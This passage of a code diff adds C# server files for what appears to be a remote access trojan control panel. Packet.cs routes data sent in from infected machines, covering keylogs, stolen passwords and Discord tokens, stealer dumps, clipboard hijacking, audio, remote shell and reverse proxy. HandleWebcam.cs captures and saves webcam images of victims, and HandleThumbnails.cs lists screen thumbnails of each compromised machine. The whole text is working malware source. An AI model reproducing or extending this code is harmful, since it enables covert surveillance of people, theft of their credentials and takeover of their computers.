new HandleLogs().Addmsg("Save stealer file fail " + ex.Message, Color.Red);
}
}
}

41
Handle_Packet/HandleThumbnails.cs Normal file
View File

@@ -0,0 +1,41 @@
using System.Drawing;
using System.IO;
using System.Windows.Forms;
using MessagePackLib.MessagePack;
using Server.Connection;
namespace Server.Handle_Packet;
public class HandleThumbnails
{
public HandleThumbnails(Clients client, MsgPack unpack_msgpack)
{
try
{
if (client.LV2 == null)
{
client.LV2 = new ListViewItem();
client.LV2.Text = $"{client.Ip}:{client.TcpClient.LocalEndPoint.ToString().Split(':')[1]}";
client.LV2.ToolTipText = client.ID;
client.LV2.Tag = client;
using MemoryStream stream = new MemoryStream(unpack_msgpack.ForcePathObject("Image").GetAsBytes());
Program.mainform.ThumbnailImageList.Images.Add(client.ID, Image.FromStream(stream));
client.LV2.ImageKey = client.ID;
lock (Settings.LockListviewThumb)
{
Program.mainform.listViewScreen.Items.Add(client.LV2);
return;
}
}
using MemoryStream stream2 = new MemoryStream(unpack_msgpack.ForcePathObject("Image").GetAsBytes());
lock (Settings.LockListviewThumb)
{
Program.mainform.ThumbnailImageList.Images.RemoveByKey(client.ID);
Program.mainform.ThumbnailImageList.Images.Add(client.ID, Image.FromStream(stream2));
}
}
catch
{
}
}
}

118
Handle_Packet/HandleWebcam.cs Normal file
View File

@@ -0,0 +1,118 @@
using System;
using System.Diagnostics;
using System.Drawing;
using System.Drawing.Imaging;
using System.IO;
using System.Windows.Forms;
using MessagePackLib.MessagePack;
using Server.Connection;
using Server.Forms;
using Server.Helper;
namespace Server.Handle_Packet;
internal class HandleWebcam
{
public HandleWebcam(MsgPack unpack_msgpack, Clients client)
{
string asString = unpack_msgpack.ForcePathObject("Command").AsString;
if (!(asString == "getWebcams"))
{
if (!(asString == "capture"))
{
return;
}
FormWebcam formWebcam = (FormWebcam)Application.OpenForms["Webcam:" + unpack_msgpack.ForcePathObject("Hwid").AsString];
try
{
if (formWebcam != null)
{
using (MemoryStream memoryStream = new MemoryStream(unpack_msgpack.ForcePathObject("Image").GetAsBytes()))
{
formWebcam.GetImage = (Image)Image.FromStream(memoryStream).Clone();
formWebcam.pictureBox1.Image = formWebcam.GetImage;
formWebcam.FPS++;
if (formWebcam.sw.ElapsedMilliseconds >= 1000)
{
if (formWebcam.SaveIt)
{
if (!Directory.Exists(formWebcam.FullPath))
{
Directory.CreateDirectory(formWebcam.FullPath);
}
formWebcam.pictureBox1.Image.Save(formWebcam.FullPath + "\\IMG_" + DateTime.Now.ToString("MM-dd-yyyy HH;mm;ss") + ".jpeg", ImageFormat.Jpeg);
}
string[] obj = new string[10]
{
"Webcam:",
unpack_msgpack.ForcePathObject("Hwid").AsString,
" FPS:",
null,
null,
null,
null,
null,
null,
null
};
int fPS = formWebcam.FPS;
obj[3] = fPS.ToString();
obj[4] = " Screen:";
obj[5] = formWebcam.GetImage.Width.ToString();
obj[6] = " x ";
obj[7] = formWebcam.GetImage.Height.ToString();
obj[8] = " Size:";
obj[9] = Methods.BytesToString(memoryStream.Length);
formWebcam.Text = string.Concat(obj);
formWebcam.FPS = 0;
formWebcam.sw = Stopwatch.StartNew();
}
return;
}
}
client.Disconnected();
return;
}
catch
{
return;
}
}
FormWebcam formWebcam2 = (FormWebcam)Application.OpenForms["Webcam:" + unpack_msgpack.ForcePathObject("Hwid").AsString];
try
{
if (formWebcam2 != null)
{
formWebcam2.Client = client;
formWebcam2.timer1.Start();
string[] array = unpack_msgpack.ForcePathObject("List").AsString.Split(new string[1] { "-=>" }, StringSplitOptions.None);
foreach (string text in array)
{
if (!string.IsNullOrWhiteSpace(text))
{
formWebcam2.comboBox1.Properties.Items.Add(text);
}
}
formWebcam2.comboBox1.SelectedIndex = 0;
if (formWebcam2.comboBox1.Text == "None")
{
client.Disconnected();
return;
}
formWebcam2.comboBox1.Enabled = true;
formWebcam2.button1.Enabled = true;
formWebcam2.btnSave.Enabled = true;
formWebcam2.numericUpDown1.Enabled = true;
formWebcam2.labelWait.Visible = false;
formWebcam2.button1.PerformClick();
}
else
{
client.Disconnected();
}
}
catch
{
}
}
}

8
Handle_Packet/LogMsg.cs Normal file
View File

@@ -0,0 +1,8 @@
namespace Server.Handle_Packet;
public class LogMsg
{
public string Time { get; set; }
public string Msg { get; set; }
}

12
Handle_Packet/NetStatItem.cs Normal file
View File

@@ -0,0 +1,12 @@
namespace Server.Handle_Packet;
public class NetStatItem
{
public string id { get; set; }
public string local { get; set; }
public string remote { get; set; }
public string state { get; set; }
}

188
Handle_Packet/Packet.cs Normal file
View File

@@ -0,0 +1,188 @@
using System;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Threading;
using System.Windows.Forms;
using MessagePackLib.MessagePack;
using Server.Connection;
using Server.Forms;
namespace Server.Handle_Packet;
public class Packet
{
public Clients client;
public byte[] data;
private HandleReverseProxy ReverseProxyHandler => Program.ReverseProxyHandler;
public void Read(object o)
{
try
{
MsgPack unpack_msgpack = new MsgPack();
unpack_msgpack.DecodeFromBytes(data);
Program.mainform.Invoke((MethodInvoker)delegate
{
switch (unpack_msgpack.ForcePathObject("Pac_ket").AsString)
{
case "dosAdd":
break;
case "ClientInfo":
ThreadPool.QueueUserWorkItem(delegate
{
new HandleListView().HandleMsgPack(client, unpack_msgpack);
});
break;
case "init_reg":
new HandleLogs().Addmsg("Initiated All Dll Plugins on " + client.Ip + ".", Color.Red);
break;
case "Ping":
new HandlePing().Ping(client, unpack_msgpack);
client.LastPing = DateTime.Now;
break;
case "HvncPing":
{
MsgPack msgPack = new MsgPack();
msgPack.ForcePathObject("Pac_ket").SetAsString("Po_ng");
ThreadPool.QueueUserWorkItem(client.Send, msgPack.Encode2Bytes());
break;
}
case "Po_ng":
new HandlePing().Po_ng(client, unpack_msgpack);
client.LastPing = DateTime.Now;
break;
case "offlinelog":
{
string asString4 = unpack_msgpack.ForcePathObject("log").GetAsString();
string text = Path.Combine(Application.StartupPath, "ClientsFolder", client.Ip, DateTime.Now.ToString("yyyy-MM-dd HH-mm-ss") + " offline_keylog.log");
File.WriteAllText(text, asString4);
Process.Start(text);
new HandleLogs().Addmsg("Offline key log on " + client.Ip + " is saved to " + text + ".", Color.Black);
break;
}
case "Logs":
new HandleLogs().Addmsg("From " + client.Ip + " client: " + unpack_msgpack.ForcePathObject("Message").AsString, Color.Black);
break;
case "thumbnails":
client.ID = unpack_msgpack.ForcePathObject("Hwid").AsString;
new HandleThumbnails(client, unpack_msgpack);
break;
case "Received":
new HandleListView().Received(client);
client.LastPing = DateTime.Now;
break;
case "Error":
{
string asString7 = unpack_msgpack.ForcePathObject("Error").AsString;
File.AppendAllText("error.log", asString7);
break;
}
case "remoteDesktop":
new HandleRemoteDesktop().Capture(client, unpack_msgpack);
break;
case "processManager":
new HandleProcessManager().GetProcess(client, unpack_msgpack);
break;
case "netstat":
new HandleNetstat().GetProcess(client, unpack_msgpack);
break;
case "socketDownload":
new HandleFileManager().SocketDownload(client, unpack_msgpack);
break;
case "keyLogger":
new HandleKeylogger(client, unpack_msgpack);
break;
case "fileManager":
new HandleFileManager().FileManager(client, unpack_msgpack);
break;
case "shell":
new HandleShell(unpack_msgpack, client);
break;
case "reportWindow":
new HandleReportWindow(client, unpack_msgpack.ForcePathObject("Report").AsString);
break;
case "reportWindow-":
{
if (Settings.ReportWindow)
{
lock (Settings.LockReportWindowClients)
{
Settings.ReportWindowClients.Add(client);
break;
}
}
MsgPack msgPack2 = new MsgPack();
msgPack2.ForcePathObject("Pac_ket").AsString = "reportWindow";
msgPack2.ForcePathObject("Option").AsString = "stop";
ThreadPool.QueueUserWorkItem(client.Send, msgPack2.Encode2Bytes());
break;
}
case "webcam":
new HandleWebcam(unpack_msgpack, client);
break;
case "sendPlugin":
ThreadPool.QueueUserWorkItem(delegate
{
client.SendPlugin(unpack_msgpack.ForcePathObject("Hashes").AsString);
});
break;
case "fileSearcher":
new HandleFileSearcher().SaveZipFile(client, unpack_msgpack);
break;
case "Information":
new HandleInformation().AddToInformationList(client, unpack_msgpack);
break;
case "Password":
new HandlePassword().SavePassword(client, unpack_msgpack);
break;
case "Audio":
new HandleAudio().SaveAudio(client, unpack_msgpack);
break;
case "recoveryPassword":
new HandleRecovery(client, unpack_msgpack);
break;
case "discordRecovery":
new HandleDiscordRecovery(client, unpack_msgpack);
break;
case "regManager":
new HandleRegManager().RegManager(client, unpack_msgpack);
break;
case "fun":
new HandleFun().Fun(client, unpack_msgpack);
break;
case "stealer":
new HandleStealer().SaveData(client, unpack_msgpack);
break;
case "clipper":
_ = unpack_msgpack.ForcePathObject("Hwid").AsString;
new HandleLogs().Addmsg("Clipper is started on " + client.Ip + "!", Color.Red);
break;
case "ReverseProxy":
ReverseProxyHandler.Execute(client, unpack_msgpack);
break;
case "runningapp":
{
string asString5 = unpack_msgpack.ForcePathObject("hwid").AsString;
string asString6 = unpack_msgpack.ForcePathObject("value").AsString;
((FormTimerKeylog)Application.OpenForms[asString5 + ":TimerKeylog"])?.LoadRunningApp(asString6);
break;
}
case "filterinfo":
{
string asString = unpack_msgpack.ForcePathObject("hwid").AsString;
string asString2 = unpack_msgpack.ForcePathObject("running").AsString;
string asString3 = unpack_msgpack.ForcePathObject("apps").AsString;
((FormTimerKeylog)Application.OpenForms[asString + ":TimerKeylog"])?.LoadInfos(asString3, asString2);
break;
}
}
});
}
catch
{
}
}
}